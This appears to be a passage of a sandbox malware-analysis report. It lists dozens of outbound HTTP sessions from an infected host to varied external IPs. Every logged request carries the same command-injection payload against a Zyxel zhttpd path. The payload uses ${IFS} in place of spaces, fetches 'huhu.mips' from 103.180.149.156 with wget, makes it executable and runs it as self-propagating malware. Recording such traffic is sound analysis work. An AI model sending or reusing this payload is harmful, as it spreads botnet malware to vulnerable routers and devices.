                                                        Feb 2, 2024 06:21:00.743185997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2090192.168.2.1451542198.230.81.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743206978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2091192.168.2.1435714211.7.177.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743242979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2092192.168.2.1454582188.68.140.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743292093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2093192.168.2.1456124147.100.229.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743324041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2094192.168.2.1447928160.25.34.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743355989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2095192.168.2.144108085.11.186.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743390083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2096192.168.2.1444134218.119.30.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743426085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2097192.168.2.1448802122.235.239.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743477106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2098192.168.2.145045484.84.185.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743514061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2099192.168.2.145638059.232.185.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743558884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2100192.168.2.145459092.52.224.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743599892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2101192.168.2.1452402137.137.117.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743653059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2102192.168.2.1459650170.156.107.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743700027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2103192.168.2.144623463.96.126.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743741989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2104192.168.2.1438630193.3.47.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743778944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2105192.168.2.144219058.7.130.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743820906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2106192.168.2.1447180191.254.79.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743868113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2107192.168.2.1441946197.23.200.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743916035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2108192.168.2.1435772135.117.222.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743966103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2109192.168.2.1446088101.76.157.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744007111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2110192.168.2.1442226189.159.134.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744035006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2111192.168.2.1449524189.13.68.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744059086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2112192.168.2.145591237.20.109.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744110107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2113192.168.2.1433218117.27.139.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744137049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2114192.168.2.1436118165.99.40.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744179010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2115192.168.2.1450820191.117.62.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744201899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2116192.168.2.1443232134.38.34.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744276047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2117192.168.2.1459478219.121.178.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744330883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2118192.168.2.144863442.105.94.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744359016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2119192.168.2.144579445.176.84.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744410992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2120192.168.2.1450218167.228.217.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744468927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2121192.168.2.1451464123.237.99.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744501114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2122192.168.2.1460794183.2.244.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744537115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2123192.168.2.144957668.141.63.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744574070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2124192.168.2.1441804170.150.25.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744602919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2125192.168.2.14369484.181.47.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744654894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2126192.168.2.1445866102.228.33.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744697094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2127192.168.2.144226443.42.241.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744735003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2128192.168.2.1442910141.1.138.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744766951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2129192.168.2.143682824.197.74.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744817019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2130192.168.2.145349466.30.191.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744862080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2131192.168.2.145279850.235.191.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744904041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2132192.168.2.144553445.213.232.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744937897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2133192.168.2.1444068142.75.97.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.744987011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2134192.168.2.1434390105.141.210.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745033979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2135192.168.2.1460276186.107.170.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745079041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2136192.168.2.1451920109.46.16.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745114088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2137192.168.2.143882677.165.248.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745167017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2138192.168.2.1459798202.65.10.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745201111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2139192.168.2.1460818222.127.157.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745261908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2140192.168.2.1456626102.54.242.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745315075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2141192.168.2.1445874195.59.79.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745367050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2142192.168.2.1446956184.180.147.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745393991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2143192.168.2.146061462.70.239.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745426893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2144192.168.2.145367214.146.252.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745471001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2145192.168.2.1457890172.12.146.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745518923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2146192.168.2.144330658.133.171.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745553017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2147192.168.2.1444110175.3.63.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745590925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2148192.168.2.14496325.121.237.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745630980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2149192.168.2.1449182184.190.78.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745683908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2150192.168.2.144621095.223.54.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745712996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2151192.168.2.146075832.61.31.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745755911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2152192.168.2.1440532148.117.231.250443
                                                        TimestampBytes transferredDirectionData
